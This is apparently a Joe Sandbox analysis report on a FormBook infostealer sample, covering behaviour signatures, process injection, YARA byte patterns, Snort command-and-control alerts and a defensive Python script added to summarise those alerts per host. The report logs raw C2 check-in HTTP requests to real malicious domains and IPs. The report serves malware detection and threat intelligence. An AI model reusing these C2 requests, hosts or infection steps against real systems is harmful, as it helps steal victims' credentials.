Windows Analysis Report
PI No 20000814C.exe

Overview

General Information

Sample name: PI No 20000814C.exe
Analysis ID: 1446508
MD5: fddc263879fbf539b746d116e8429a7f
SHA1: d83296177c8f166a95cafbd12ac1ae327ded42c7
SHA256: 6803a04a376df6f873fe53b3b79bf12534b8c1b74d037a01f537e74bac994f88
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PI No 20000814C.exe (PID: 1096 cmdline: "C:\Users\user\Desktop\PI No 20000814C.exe" MD5: FDDC263879FBF539B746D116E8429A7F)
    • svchost.exe (PID: 3204 cmdline: "C:\Users\user\Desktop\PI No 20000814C.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • YoOsbbockoYKKBpRowW.exe (PID: 1132 cmdline: "C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cipher.exe (PID: 3432 cmdline: "C:\Windows\SysWOW64\cipher.exe" MD5: EC2B2944AB4480E520A8015A0740E684)
          • YoOsbbockoYKKBpRowW.exe (PID: 3152 cmdline: "C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6408 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x76a65:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x600b4:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2da13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17062:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(11 memory-dump entries in total; only the first entries are reproduced here)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.470000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.470000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2cc13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.470000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.470000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2da13:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17062:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\PI No 20000814C.exe", CommandLine: "C:\Users\user\Desktop\PI No 20000814C.exe", CommandLine|base64offset|contains: 6, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PI No 20000814C.exe", ParentImage: C:\Users\user\Desktop\PI No 20000814C.exe, ParentProcessId: 1096, ParentProcessName: PI No 20000814C.exe, ProcessCommandLine: "C:\Users\user\Desktop\PI No 20000814C.exe", ProcessId: 3204, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\PI No 20000814C.exe", CommandLine: "C:\Users\user\Desktop\PI No 20000814C.exe", CommandLine|base64offset|contains: 6, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PI No 20000814C.exe", ParentImage: C:\Users\user\Desktop\PI No 20000814C.exe, ParentProcessId: 1096, ParentProcessName: PI No 20000814C.exe, ProcessCommandLine: "C:\Users\user\Desktop\PI No 20000814C.exe", ProcessId: 3204, ProcessName: svchost.exe

            AV Detection

Source: PI No 20000814C.exe | Virustotal: Detection: 41%
Source: PI No 20000814C.exe | ReversingLabs: Detection: 39%
Source: Yara match | File source: 2.2.svchost.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.470000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4527764176.0000000005230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2228247758.0000000000470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4525395645.0000000004FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4518364986.00000000032B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4525512009.0000000005000000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4525518993.0000000003490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2228534862.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2229293264.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PI No 20000814C.exe | Joe Sandbox ML: detected
Source: PI No 20000814C.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4522417554.0000000000B0E000.00000002.00000001.01000000.00000004.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000002.4520103554.0000000000B0E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: cipher.pdbGCTL source: svchost.exe, 00000002.00000003.2189455076.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189561503.0000000000824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189549997.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4523783165.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: PI No 20000814C.exe, 00000000.00000003.2073451673.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PI No 20000814C.exe, 00000000.00000003.2068404120.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2133255523.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131687786.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2231107053.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.00000000054CE000.00000040.00001000.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2228686440.0000000004FC9000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.0000000005330000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PI No 20000814C.exe, 00000000.00000003.2073451673.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PI No 20000814C.exe, 00000000.00000003.2068404120.0000000004140000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2133255523.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2228571513.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2131687786.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, cipher.exe, 00000004.00000003.2231107053.000000000517B000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.00000000054CE000.00000040.00001000.00020000.00000000.sdmp, cipher.exe, 00000004.00000003.2228686440.0000000004FC9000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4526166788.0000000005330000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: cipher.pdb source: svchost.exe, 00000002.00000003.2189455076.000000000081B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189561503.0000000000824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2189549997.000000000081A000.00000004.00000020.00020000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000003.00000002.4523783165.0000000000F58000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.000000000595C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000000.2294539836.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2520062623.000000002C8EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: cipher.exe, 00000004.00000002.4520210070.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, cipher.exe, 00000004.00000002.4527269915.000000000595C000.00000004.10000000.00040000.00000000.sdmp, YoOsbbockoYKKBpRowW.exe, 00000006.00000000.2294539836.0000000002DFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2520062623.000000002C8EC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F64696 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6C93C FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F63A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F63D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F6BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032CBBC0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\cipher.exe | Code function: 4_2_032B9750 4x nop then xor eax, eax

            Networking

            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49705 -> 69.57.162.24:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49706 -> 162.240.81.18:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49707 -> 162.240.81.18:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49709 -> 162.240.81.18:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49711 -> 216.40.34.41:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49712 -> 216.40.34.41:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49714 -> 216.40.34.41:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49715 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49716 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49718 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49719 -> 104.21.28.203:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49720 -> 104.21.28.203:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49722 -> 104.21.28.203:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49723 -> 203.161.43.228:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49724 -> 203.161.43.228:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49726 -> 203.161.43.228:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49727 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49728 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49730 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49731 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49732 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49734 -> 3.33.130.190:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49735 -> 185.253.212.22:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49736 -> 185.253.212.22:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49738 -> 185.253.212.22:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49739 -> 87.236.16.214:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49740 -> 87.236.16.214:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49742 -> 87.236.16.214:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49743 -> 188.114.96.3:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49744 -> 188.114.96.3:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49746 -> 188.114.96.3:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49747 -> 194.58.112.174:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49748 -> 194.58.112.174:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49750 -> 194.58.112.174:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49751 -> 5.101.153.149:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49752 -> 5.101.153.149:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49754 -> 5.101.153.149:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49755 -> 92.118.24.161:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49756 -> 92.118.24.161:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49758 -> 92.118.24.161:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49759 -> 212.227.172.253:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49760 -> 212.227.172.253:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49762 -> 212.227.172.253:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49763 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49764 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49766 -> 3.33.130.190:80
            Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49767 -> 69.57.162.24:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49768 -> 162.240.81.18:80
            Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49769 -> 162.240.81.18:80
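The alert list above is the raw evidence behind the Snort signature; what an analyst wants from it is one row per C2 host with the check-in sequence, the rule ids that fired and whether each request used a fresh connection. The script below is an added example written for this page, not part of the Joe Sandbox report or of the sample. It embeds a subset of the alert lines above as sample input (with the "Source: Traffic |" column separator restored) and summarises them per destination. The parsing regex, the summary fields and the "full cycle" check (two POST check-ins followed by one GET, the order the report shows per host) are this example's own assumptions.

```python
"""Summarise FormBook CnC check-in alerts per destination (added example)."""
import re

# Matches the Snort alert rows in the report: rule id, message with the HTTP
# method in parentheses, then src:port -> dst:port.
ALERT_RE = re.compile(
    r"Snort IDS:\s*(?P<sid>\d+)\s+(?P<msg>.*?\((?P<method>GET|POST)\)\s*M\d)\s+"
    r"(?P<src>\d+(?:\.\d+){3}):(?P<sport>\d+)\s*->\s*(?P<dst>\d+(?:\.\d+){3}):(?P<dport>\d+)"
)

# Sample input: a subset of the alert lines from the report above.
SAMPLE_ALERTS = """\
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49743 -> 188.114.96.3:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49744 -> 188.114.96.3:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49746 -> 188.114.96.3:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49747 -> 194.58.112.174:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49748 -> 194.58.112.174:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49750 -> 194.58.112.174:80
Source: Traffic | Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49767 -> 69.57.162.24:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49768 -> 162.240.81.18:80
Source: Traffic | Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.6:49769 -> 162.240.81.18:80
"""


def parse_alert(line):
    """Return the alert fields as a dict, or None for a line that is not an alert."""
    m = ALERT_RE.search(line)
    if m is None:
        return None
    fields = m.groupdict()
    for key in ("sid", "sport", "dport"):
        fields[key] = int(fields[key])
    return fields


def summarize(lines):
    """Group alerts by destination IP, keeping the check-in order as seen."""
    summary = {}
    for line in lines:
        alert = parse_alert(line)
        if alert is None:
            continue
        entry = summary.setdefault(alert["dst"], {
            "port": alert["dport"], "methods": [], "sports": [], "sids": set(), "msgs": set()})
        entry["methods"].append(alert["method"])
        entry["sports"].append(alert["sport"])
        entry["sids"].add(alert["sid"])
        entry["msgs"].add(alert["msg"])
    return summary


def full_cycles(summary):
    """Destinations that completed the POST, POST, GET sequence the report shows."""
    return [dst for dst, e in summary.items() if e["methods"] == ["POST", "POST", "GET"]]


def one_connection_per_request(entry):
    """True when every alert for a host came from a distinct source port, which is
    what the Connection: close header on the requests produces."""
    return len(set(entry["sports"])) == len(entry["sports"])


def ioc_lines(summary):
    """Flat IOC list: one ip:port per destination with the rule ids that fired."""
    return [f"{dst}:{e['port']} sids={sorted(e['sids'])} seq={'/'.join(e['methods'])}"
            for dst, e in summary.items()]


if __name__ == "__main__":
    s = summarize(SAMPLE_ALERTS.splitlines())
    for row in ioc_lines(s):
        print(row)
    print("full cycles:", full_cycles(s))
```

Feeding the complete alert list from the report instead of the subset gives one row per C2 host; the hosts whose sequence stops short (69.57.162.24 with a lone GET, 162.240.81.18 with two POSTs) are where the listing is cut off, not evidence of different behaviour.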
            Source: DNS query: www.autonomyai.xyz
            Source: Joe Sandbox View | IP Address: 162.240.81.18
            Source: Joe Sandbox View | IP Address: 69.57.162.24
            Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1 (US)
            Source: Joe Sandbox View | ASN Name: BEGET-AS (RU)
            Source: Joe Sandbox View | ASN Name: EZIT-AS (HU)
            Source: Joe Sandbox View | ASN Name: FORTRESSITX (US)
            Source: Joe Sandbox View | ASN Name: GREENER-AS (PL)
            Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (16 occurrences)
            Source: C:\Users\user\Desktop\PI No 20000814C.exe | Code function: 0_2_00F725E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, | 0_2_00F725E2
            Source: global traffic | HTTP traffic detected: GET /88o1/?FNPd=6H0XwdryOyxEld2In19mTcPbDWu4JiPerPnhtxRIRMEZrjEQVkxwg3m1x0TM7/jCK+5wA6bK2pnso5xUF2TOd/2As6zlvvV262DB5DqMTNUdTxWj14lc65WjVUDEbYoF5Wnps5M=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.emgeecontracting.shop | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /x98j/?FNPd=qjxZKFsELly6MM+AmuUyu+F9rQiXp5lDW0qCpVrbxnhhuort7QqFJtzXrMzOc4R6Q1I+kDBccd8ZIbwb2K8nQH4tZ93h2GRHyGwno8v69jYjSXEAvgOChTSVAihV0isdDVgpDYw=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.upshercode.store | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: global traffic | HTTP traffic detected: GET /qukz/?FNPd=2j86s8NJ5fDu8DdyaluKTyyQGpxO5RQn4ZQP4QlLq4dDbMhIcvPH81QwZFWQYfauPSKzeNxy1T+ygqRogiCCubiSHCzeY+ai+VGnS0fEikTej8/T0yfRDQzRtbWcxq7BJieL0EY=&zdK0d=M8mTZ0xHNd1dPVm HTTP/1.1 | Host: www.botcsllc.com | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.9 | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
